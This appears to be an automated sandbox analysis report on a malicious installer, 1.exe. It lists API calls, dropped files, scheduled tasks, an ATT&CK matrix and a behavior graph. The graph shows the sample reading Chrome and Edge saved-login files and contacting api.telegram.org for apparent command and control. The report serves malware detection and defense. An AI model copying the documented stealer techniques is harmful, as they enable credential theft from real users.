    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="5480" chaineruiprocessid="5480chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1740568836 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"Jump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008B0D70 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,0_2_008B0D70
    Source: C:\Users\user\Desktop\1.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_009A60F4
    Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_009A63B3
    Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_009A63FE
    Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_009A6499
    Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_009A68B5
    Source: C:\Users\user\Desktop\1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_009A6A97
    Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,0_2_008E4A20
    Source: C:\Users\user\Desktop\1.exeCode function: EnumSystemLocalesW,0_2_0099D7D2
    Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,0_2_0099DD4F
    Source: C:\Users\user\Desktop\1.exeCode function: GetLocaleInfoW,4_2_0099DD4F
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Users\user\AppData\Local\Packages\5nWUKDRPlH\output.zip VolumeInformation
    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Users\user\AppData\Local\Packages\5nWUKDRPlH\output.zip VolumeInformation
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008FBD60 CreateNamedPipeW,CreateFileW,0_2_008FBD60
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0098419E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0098419E
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008FA6E0 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,0_2_008FA6E0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00757A00 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00757A00
    Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\1.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A BlobJump to behavior

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media    		13
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		11
    Disable or Modify Tools    		1
    OS Credential Dumping    		1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Command and Scripting Interpreter    		1
    Scheduled Task/Job    		1
    Access Token Manipulation    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory11
    Peripheral Device Discovery    		Remote Desktop Protocol1
    Data from Local System    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job    		Logon Script (Windows)112
    Process Injection    		3
    Obfuscated Files or Information    		Security Account Manager1
    Account Discovery    		SMB/Windows Admin Shares1
    Screen Capture    		11
    Encrypted Channel    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Scheduled Task/Job    		1
    Timestomp    		NTDS4
    File and Directory Discovery    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets27
    System Information Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    File Deletion    		Cached Domain Credentials121
    Security Software Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
    Masquerading    		DCSync31
    Virtualization/Sandbox Evasion    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    Modify Registry    		Proc Filesystem2
    Process Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
    Virtualization/Sandbox Evasion    		/etc/passwd and /etc/shadow1
    Application Window Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    Access Token Manipulation    		Network Sniffing1
    System Owner/User Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
    Process Injection    		Input Capture1
    System Network Configuration Discovery    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1624614 Sample: 1.exe Startdate: 26/02/2025 Architecture: WINDOWS Score: 46 88 api.telegram.org 2->88 90 wetransfers.io 2->90 92 8 other IPs or domains 2->92 106 Suricata IDS alerts for network traffic 2->106 108 Antivirus detection for URL or domain 2->108 110 Multi AV Scanner detection for dropped file 2->110 114 3 other signatures 2->114 9 1.exe 84 2->9         started        12 msiexec.exe 20 41 2->12         started        14 MainSoftware.exe 2->14         started        16 2 other processes 2->16 signatures3 112 Uses the Telegram API (likely for C&C communication) 88->112 process4 dnsIp5 68 C:\Users\user\AppData\...\MainSoftware.exe, PE32+ 9->68 dropped 70 C:\Users\user\...\SoftwareDistributor.exe, PE32+ 9->70 dropped 82 15 other malicious files 9->82 dropped 19 1.exe 6 9->19         started        72 C:\Windows\Installer\MSIE45E.tmp, PE32 12->72 dropped 74 C:\Windows\Installer\MSID857.tmp, PE32 12->74 dropped 76 C:\Windows\Installer\MSID7F8.tmp, PE32 12->76 dropped 84 7 other malicious files 12->84 dropped 22 MainSoftware.exe 15 12->22         started        25 msiexec.exe 12 12->25         started        27 SoftwareDistributor.exe 12->27         started        33 2 other processes 12->33 78 C:\Program Files (x86)\Main\...\Install.exe, PE32+ 14->78 dropped 29 Install.exe 14->29         started        86 boldvertex.store 104.21.16.1 CLOUDFLARENETUS United States 16->86 80 C:\Program Files\Surfclub\Surfclub.exe, PE32+ 16->80 dropped 31 Surfclub.exe 16->31         started        file6 process7 dnsIp8 60 C:\Users\user\AppData\Local\...\shiB789.tmp, PE32+ 19->60 dropped 102 jonatechlab.com 104.21.6.210 CLOUDFLARENETUS United States 22->102 35 schtasks.exe 22->35         started        37 schtasks.exe 22->37         started        104 swiftvantage.online 104.21.80.136, 443, 49740 CLOUDFLARENETUS United States 25->104 62 C:\Program Files (x86)\...\Install.exe.part, PE32+ 25->62 dropped 64 C:\Program Files (x86)\...\Install.exe (copy), PE32+ 25->64 dropped 39 schtasks.exe 27->39         started        41 cmd.exe 29->41         started        43 conhost.exe 29->43         started        file9 process10 process11 45 conhost.exe 35->45         started        47 conhost.exe 37->47         started        49 conhost.exe 39->49         started        51 regsvr32.exe 41->51         started        55 curl.exe 41->55         started        58 conhost.exe 41->58         started        dnsIp12 94 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 51->94 96 ifconfig.me 34.160.111.145 ATGS-MMD-ASUS United States 51->96 116 System process connects to network (likely due to code injection or exploit) 51->116 118 Tries to harvest and steal browser information (history, passwords, etc) 51->118 98 wetransfers.io 104.21.59.228 CLOUDFLARENETUS United States 55->98 100 127.0.0.1 unknown unknown 55->100 66 C:\Users\user\AppData\Local\Temp\289930.ocx, PE32+ 55->66 dropped file13 signatures14

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.